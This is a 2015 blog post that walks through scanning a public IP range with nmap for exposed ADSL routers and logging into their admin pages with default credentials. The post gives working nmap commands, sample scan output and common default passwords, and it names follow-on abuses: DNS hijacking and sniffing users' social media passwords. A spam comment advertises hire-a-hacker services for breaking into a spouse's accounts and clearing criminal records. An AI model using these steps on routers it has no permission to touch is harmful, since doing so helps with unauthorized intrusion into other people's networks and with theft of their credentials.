Wednesday 14 October 2015

HACKING FOR Vulnerable Routers

Search for Vulnerable Routers

Now that we have NMAP sorted, we are going to run the following command to scan for ADSL Modem Routers based on their Banner on Port 80 to start our ADSL router hack. All you need is to pick an IP range. I’ve used an example below using 101.53.64.1/24 range.

Search from Linux using command Line

In Linux run the following command:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'


In Windows or Mac open NMAP and copy paste this line:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -
Once it finds the results, search for the word ‘open’ to narrow down results. A typical Linux NMAP command would return outputs line below: (and of course I’ve changed the IP details)
Host: 101.53.64.3 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 ()  Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.9 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.31 () Ports: 80/open/tcp//http?///
Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.35 () Ports: 80/open/tcp//http?///
Host: 101.53.64.37 () Ports: 80/open/tcp//http?///
Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.52 () Ports: 80/open/tcp//http?///
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.58 () Ports: 80/open/tcp//http?///
Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/
Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.107 ()        Ports: 80/open/tcp//http?///
Host: 101.53.64.112 ()        Ports: 80/open/tcp//http?///
Host: 101.53.64.115 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.123 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.129 ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.135 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.145 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.149 ()        Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: 101.53.64.167 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.170 ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.186 ()        Ports: 80/open/tcp//http?///
Host: 101.53.64.188 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.193 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.202 ()        Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: 101.53.64.214 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.224 ()        Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/
This was taking a long time (we are after all try to scan 256 hosts using the command above). Me being just impatient, I wanted to check if my Kali Linux was actually doing anything to ADSL router hack. I used the following command in a separate Terminal to monitor what my PC was doing… it was doing a lot …
tcpdump -ni eth0
That’s a lot of connected hosts with TCP Port 80 open. Some got ‘tcpwrapped’ marked on them. It means they are possibly not accessible.

Search from Windows, Mac or Linux using GUI – NMAP or Zenmap

Assuming you got NMAP installation sorted, you can now open NMAP (In Kali Linux or similar Linux distro, you can use Zenmap which is GUI version of NAMP cross platform). Copy paste the following line in Command field
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG -
another version of this command is using different representation of Subnet MASK.
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -
Press SCAN Button and wait few minutes till the scan is over.

Once you have some results, then you need to find the open devices with open ports. In search Result page:
  1. Click on Services Button
  2. Click on http Service
  3. Click on Ports/Hosts TAB (Twice to sort them by status)
As you can see, I’ve found a few devices with open http port 80.

It is quite amazing how many devices got ports open facing outer DMZ.

Access Management Webpage

Pick one at a time. For example try this:
http://101.53.64.3
http://101.53.64.4
http://101.53.64.129

You get the idea. If it opens a webpage asking for username and password, try one of the following combinations:
admin/admin
admin/password
admin/pass
admin/secret
If you can find the Router’s model number and make, you can find exact username and password from this webpage:http://portforward.com/default_username_password/ Before we finish up, I am sure you were already impatient like me as a lot of the routers had ‘tcpwrapped’ on them which was actually stopping us from accessing the web management interface to ADSL router hack. Following command will exclude those devices from our search. I’ve also expanded my search to a broader range using a slightly different Subnet MASK.
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'
In this command I am using /22 Subnet Mask with 2 specific outputs: I am looking for the work ‘open’ and excluding ‘tcpwrapped’ on my output. As you can see, I still get a lot of outputs.

Final Words

You’ll be surprised how many have default username and passwords enabled. Once you get your access to the router, you can do a lot more, like DNS hijacking, steal username and passwords (for example: Social Media username passwords (FaceBook, Twitter, WebMail etc.)) using tcpdump/snoop on router’s interface and many more using ADSL router hack … Why did I write this guide?  Here’s one for example:

As you can see Jhefeson probably has a legitimate reason to try and reboot this shared router, but he can’t just because he doesn’t have physical access to it. If this guide works, he can actually get access back.
There’s many things you can do after you’ve got access to a router. You can change DNS settings, setup a tcpdump and later snoop all plaintext passwords using wireshark etc. If you know a friends, family. colleague or neighbor who didn’t change their routers default password, let them know of the risks.
But I am not here to judge whether it should be done or not, but this is definitely a way to gain access to a router. So hacking is not always bad, it sometime is required when you loose access or a system just wouldn’t respond. As a pentester, you should raise awareness. Share this guide as anyone who uses a Linux, Windows, Mac can use this guide to test their own network and fix ADSL router hack issue.
Posted by at

1 comment:

  1. felisha green4 January 2021 at 16:03

    Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com

    ReplyDelete

Subscribe to: Post Comments (Atom)